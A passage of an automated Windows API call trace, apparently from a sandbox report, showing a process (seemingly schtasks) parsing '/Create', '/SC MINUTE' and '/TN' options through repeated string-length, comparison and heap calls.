/CREATE /?\" for usage.") returned 37 [0113.370] GetProcessHeap () returned 0x3300000 [0113.370] GetProcessHeap () returned 0x3300000 [0113.370] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330f138) returned 1 [0113.370] GetProcessHeap () returned 0x3300000 [0113.370] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330f138) returned 0x766 [0113.370] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330f138) returned 1 [0113.370] RtlRestoreLastWin32Error () returned 0x3163000 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="create") returned 6 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="?") returned 1 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="s") returned 1 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="u") returned 1 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="p") returned 1 [0113.370] GetThreadLocale () returned 0x409 [0113.370] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.370] lstrlenW (lpString="ru") returned 2 [0113.370] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="rp") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="sc") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="mo") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="d") returned 1 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="m") returned 1 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="i") returned 1 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="tn") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="tr") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="st") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="sd") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="ed") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="it") returned 2 [0113.371] GetThreadLocale () returned 0x409 [0113.371] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.371] lstrlenW (lpString="et") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="k") returned 1 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="du") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="ri") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="z") returned 1 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="f") returned 1 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="v1") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="xml") returned 3 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="ec") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="rl") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="delay") returned 5 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="np") returned 2 [0113.372] GetThreadLocale () returned 0x409 [0113.372] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0113.372] lstrlenW (lpString="hresult") returned 7 [0113.372] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] lstrlenW (lpString="/Create") returned 7 [0113.373] lstrlenW (lpString="-/") returned 2 [0113.373] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.373] lstrlenW (lpString="create") returned 6 [0113.373] lstrlenW (lpString="create") returned 6 [0113.373] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.373] lstrlenW (lpString="Create") returned 6 [0113.373] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.373] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|create|") returned 8 [0113.373] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|Create|") returned 8 [0113.373] lstrlenW (lpString="|create|") returned 8 [0113.373] lstrlenW (lpString="|Create|") returned 8 [0113.373] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0113.373] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] lstrlenW (lpString="/SC") returned 3 [0113.373] lstrlenW (lpString="-/") returned 2 [0113.373] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.373] lstrlenW (lpString="create") returned 6 [0113.373] lstrlenW (lpString="create") returned 6 [0113.373] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.373] lstrlenW (lpString="SC") returned 2 [0113.373] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.373] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|create|") returned 8 [0113.373] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.373] lstrlenW (lpString="|create|") returned 8 [0113.373] lstrlenW (lpString="|SC|") returned 4 [0113.373] StrStrIW (lpFirst="|create|", lpSrch="|SC|") returned 0x0 [0113.373] RtlRestoreLastWin32Error () returned 0x3163000 [0113.373] lstrlenW (lpString="?") returned 1 [0113.373] lstrlenW (lpString="?") returned 1 [0113.373] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] lstrlenW (lpString="SC") returned 2 [0113.374] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|?|") returned 3 [0113.374] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.374] lstrlenW (lpString="|?|") returned 3 [0113.374] lstrlenW (lpString="|SC|") returned 4 [0113.374] RtlRestoreLastWin32Error () returned 0x3163000 [0113.374] lstrlenW (lpString="s") returned 1 [0113.374] lstrlenW (lpString="s") returned 1 [0113.374] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] lstrlenW (lpString="SC") returned 2 [0113.374] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|s|") returned 3 [0113.374] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.374] lstrlenW (lpString="|s|") returned 3 [0113.374] lstrlenW (lpString="|SC|") returned 4 [0113.374] RtlRestoreLastWin32Error () returned 0x3163000 [0113.374] lstrlenW (lpString="u") returned 1 [0113.374] lstrlenW (lpString="u") returned 1 [0113.374] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] lstrlenW (lpString="SC") returned 2 [0113.374] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|u|") returned 3 [0113.374] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.374] lstrlenW (lpString="|u|") returned 3 [0113.374] lstrlenW (lpString="|SC|") returned 4 [0113.374] RtlRestoreLastWin32Error () returned 0x3163000 [0113.374] lstrlenW (lpString="p") returned 1 [0113.374] lstrlenW (lpString="p") returned 1 [0113.374] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.374] lstrlenW (lpString="SC") returned 2 [0113.374] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|p|") returned 3 [0113.375] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.375] lstrlenW (lpString="|p|") returned 3 [0113.375] lstrlenW (lpString="|SC|") returned 4 [0113.375] RtlRestoreLastWin32Error () returned 0x3163000 [0113.375] lstrlenW (lpString="ru") returned 2 [0113.375] lstrlenW (lpString="ru") returned 2 [0113.375] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] lstrlenW (lpString="SC") returned 2 [0113.375] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ru|") returned 4 [0113.375] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.375] lstrlenW (lpString="|ru|") returned 4 [0113.375] lstrlenW (lpString="|SC|") returned 4 [0113.375] StrStrIW (lpFirst="|ru|", lpSrch="|SC|") returned 0x0 [0113.375] RtlRestoreLastWin32Error () returned 0x3163000 [0113.375] lstrlenW (lpString="rp") returned 2 [0113.375] lstrlenW (lpString="rp") returned 2 [0113.375] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] lstrlenW (lpString="SC") returned 2 [0113.375] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|rp|") returned 4 [0113.375] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.375] lstrlenW (lpString="|rp|") returned 4 [0113.375] lstrlenW (lpString="|SC|") returned 4 [0113.375] StrStrIW (lpFirst="|rp|", lpSrch="|SC|") returned 0x0 [0113.375] RtlRestoreLastWin32Error () returned 0x3163000 [0113.375] lstrlenW (lpString="sc") returned 2 [0113.375] lstrlenW (lpString="sc") returned 2 [0113.375] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.375] lstrlenW (lpString="SC") returned 2 [0113.375] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.376] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|sc|") returned 4 [0113.376] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|SC|") returned 4 [0113.376] lstrlenW (lpString="|sc|") returned 4 [0113.376] lstrlenW (lpString="|SC|") returned 4 [0113.376] StrStrIW (lpFirst="|sc|", lpSrch="|SC|") returned="|sc|" [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] lstrlenW (lpString="MINUTE") returned 6 [0113.376] lstrlenW (lpString="-/") returned 2 [0113.376] StrChrIW (lpStart="-/", wMatch=0x32f004d) returned 0x0 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] lstrlenW (lpString="MINUTE") returned 6 [0113.376] StrChrIW (lpStart="MINUTE", wMatch=0x3a) returned 0x0 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] RtlRestoreLastWin32Error () returned 0x3163000 [0113.376] GetProcessHeap () returned 0x3300000 [0113.376] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x330fc30 [0113.376] _memicmp (_Buf1=0x330fc30, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.376] lstrlenW (lpString="MINUTE") returned 6 [0113.376] GetProcessHeap () returned 0x3300000 [0113.376] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0xe) returned 0x330fcf0 [0113.376] lstrlenW (lpString="MINUTE") returned 6 [0113.376] lstrlenW (lpString=" \x09") returned 2 [0113.376] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0113.376] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0113.376] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0113.376] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0113.484] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0113.484] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0113.484] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0113.484] GetLastError () returned 0x0 [0113.484] lstrlenW (lpString="MINUTE") returned 6 [0113.484] lstrlenW (lpString="MINUTE") returned 6 [0113.484] RtlRestoreLastWin32Error () returned 0x3163000 [0113.484] RtlRestoreLastWin32Error () returned 0x3163000 [0113.484] lstrlenW (lpString="/TN") returned 3 [0113.484] lstrlenW (lpString="-/") returned 2 [0113.484] StrChrIW (lpStart="-/", wMatch=0x32f002f) returned="/" [0113.484] lstrlenW (lpString="create") returned 6 [0113.484] lstrlenW (lpString="create") returned 6 [0113.484] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.484] lstrlenW (lpString="TN") returned 2 [0113.485] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x9, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|create|") returned 8 [0113.485] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.485] lstrlenW (lpString="|create|") returned 8 [0113.485] lstrlenW (lpString="|TN|") returned 4 [0113.485] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0113.485] RtlRestoreLastWin32Error () returned 0x3163000 [0113.485] lstrlenW (lpString="?") returned 1 [0113.485] lstrlenW (lpString="?") returned 1 [0113.485] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] lstrlenW (lpString="TN") returned 2 [0113.485] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|?|") returned 3 [0113.485] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.485] lstrlenW (lpString="|?|") returned 3 [0113.485] lstrlenW (lpString="|TN|") returned 4 [0113.485] RtlRestoreLastWin32Error () returned 0x3163000 [0113.485] lstrlenW (lpString="s") returned 1 [0113.485] lstrlenW (lpString="s") returned 1 [0113.485] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] lstrlenW (lpString="TN") returned 2 [0113.485] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|s|") returned 3 [0113.485] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.485] lstrlenW (lpString="|s|") returned 3 [0113.485] lstrlenW (lpString="|TN|") returned 4 [0113.485] RtlRestoreLastWin32Error () returned 0x3163000 [0113.485] lstrlenW (lpString="u") returned 1 [0113.485] lstrlenW (lpString="u") returned 1 [0113.485] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.485] lstrlenW (lpString="TN") returned 2 [0113.485] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.486] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|u|") returned 3 [0113.486] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.486] lstrlenW (lpString="|u|") returned 3 [0113.486] lstrlenW (lpString="|TN|") returned 4 [0113.486] RtlRestoreLastWin32Error () returned 0x3163000 [0113.486] lstrlenW (lpString="p") returned 1 [0113.486] lstrlenW (lpString="p") returned 1 [0113.486] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.486] lstrlenW (lpString="TN") returned 2 [0113.486] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.486] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|p|") returned 3 [0113.486] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.486] lstrlenW (lpString="|p|") returned 3 [0113.486] lstrlenW (lpString="|TN|") returned 4 [0113.486] RtlRestoreLastWin32Error () returned 0x3163000 [0113.486] lstrlenW (lpString="ru") returned 2 [0113.486] lstrlenW (lpString="ru") returned 2 [0113.486] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.486] lstrlenW (lpString="TN") returned 2 [0113.486] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.486] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|ru|") returned 4 [0113.486] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.486] lstrlenW (lpString="|ru|") returned 4 [0113.487] lstrlenW (lpString="|TN|") returned 4 [0113.487] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0113.487] RtlRestoreLastWin32Error () returned 0x3163000 [0113.487] lstrlenW (lpString="rp") returned 2 [0113.487] lstrlenW (lpString="rp") returned 2 [0113.487] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.487] lstrlenW (lpString="TN") returned 2 [0113.487] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.487] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|rp|") returned 4 [0113.487] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.487] lstrlenW (lpString="|rp|") returned 4 [0113.487] lstrlenW (lpString="|TN|") returned 4 [0113.487] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0113.487] RtlRestoreLastWin32Error () returned 0x3163000 [0113.487] lstrlenW (lpString="sc") returned 2 [0113.487] lstrlenW (lpString="sc") returned 2 [0113.487] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.487] lstrlenW (lpString="TN") returned 2 [0113.487] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.487] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|sc|") returned 4 [0113.487] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.487] lstrlenW (lpString="|sc|") returned 4 [0113.487] lstrlenW (lpString="|TN|") returned 4 [0113.487] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0113.487] RtlRestoreLastWin32Error () returned 0x3163000 [0113.487] lstrlenW (lpString="mo") returned 2 [0113.487] lstrlenW (lpString="mo") returned 2 [0113.487] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.487] lstrlenW (lpString="TN") returned 2 [0113.487] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.488] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|mo|") returned 4 [0113.488] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.488] lstrlenW (lpString="|mo|") returned 4 [0113.488] lstrlenW (lpString="|TN|") returned 4 [0113.488] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0113.488] RtlRestoreLastWin32Error () returned 0x3163000 [0113.488] lstrlenW (lpString="d") returned 1 [0113.488] lstrlenW (lpString="d") returned 1 [0113.488] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.488] lstrlenW (lpString="TN") returned 2 [0113.488] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.488] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|d|") returned 3 [0113.488] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.488] lstrlenW (lpString="|d|") returned 3 [0113.488] lstrlenW (lpString="|TN|") returned 4 [0113.488] RtlRestoreLastWin32Error () returned 0x3163000 [0113.488] lstrlenW (lpString="m") returned 1 [0113.488] lstrlenW (lpString="m") returned 1 [0113.488] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.488] lstrlenW (lpString="TN") returned 2 [0113.488] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.488] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|m|") returned 3 [0113.488] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.488] lstrlenW (lpString="|m|") returned 3 [0113.488] lstrlenW (lpString="|TN|") returned 4 [0113.488] RtlRestoreLastWin32Error () returned 0x3163000 [0113.488] lstrlenW (lpString="i") returned 1 [0113.488] lstrlenW (lpString="i") returned 1 [0113.488] _memicmp (_Buf1=0x330fac8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.489] lstrlenW (lpString="TN") returned 2 [0113.489] _memicmp (_Buf1=0x330fbe8, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.489] _vsnwprintf (in: _Buffer=0x330d150, _BufferCount=0x4, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|i|") returned 3 [0113.489] _vsnwprintf (in: _Buffer=0x330d1b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xd2cab8 | out: _Buffer="|TN|") returned 4 [0113.489] lstrlenW (lpString="|i|") returned 3 [0113.489] lstrlenW (lpString="|TN|") returned 4 [0113.489] RtlRestoreLastWin32Error () returned 0x3163000 [0113.489] lstrlenW (lpString="tn") returned 2 [0113.489] lstrlenW (lpString="tn") returned 